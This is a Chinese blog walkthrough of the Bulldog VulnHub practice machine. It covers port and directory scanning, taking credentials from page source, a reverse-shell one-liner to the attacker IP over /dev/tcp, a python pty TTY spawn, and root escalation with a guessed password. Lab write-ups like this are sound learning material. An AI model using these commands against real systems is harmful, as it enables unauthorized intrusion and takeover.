bulldog-vulnhub渗透测试

前言

一个很老的靶机,Bulldog-vlunhub

攻击机IP:192.168.1.124

靶机IP:192.168.1.158

渗透过程

扫描端口

image-20200130161134573

访问80端口,扫描目录

image-20200130170514749

在访问admin发现这是个后台,可以登录的,但是现在缺的是账号密码

然后访问/dev/

这里有一个webshell的链接

image-20200130170945828

返回这么个东西,我们得与服务器完成认证后才能使用shell

所以得获得一个能登录后台的账号密码

查看源码:

image-20200130170743823

然后可以获得一个可以登录的账号,密码(md5解密一下)

nick : bulldog

登录后,在访问webshell的链接

image-20200130171158307

反弹shell,同时监听攻击机6666端口。

1
echo "bash -i >& /dev/tcp/192.168.1.124/6666 0>&1" | bash

image-20200130171340134

然后查看/etc/passwd

image-20200130171427135

获得一个root用户:bulldogadmin

划重点———————————

查看bulldogadmin的相关文件

1
find / -user bulldogadmin 2>/dev/null

image-20200130171655373

查看这两个文件

image-20200130171747908

image-20200130171904296

猜测密码为:SUPERultimatePASSWORDyouCANTget

然后提权

提权前第一件事儿就是获得tty

1
python -c 'import pty; pty.spawn("/bin/bash")'

image-20200130172318557

提权成功

总结

像极了CTF,有点脑洞,然后学习了查看root用户文件

image-20200130172318557

Author: 我是小吴啦
Link: http://yoursite.com/2020/02/03/bulldog-vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.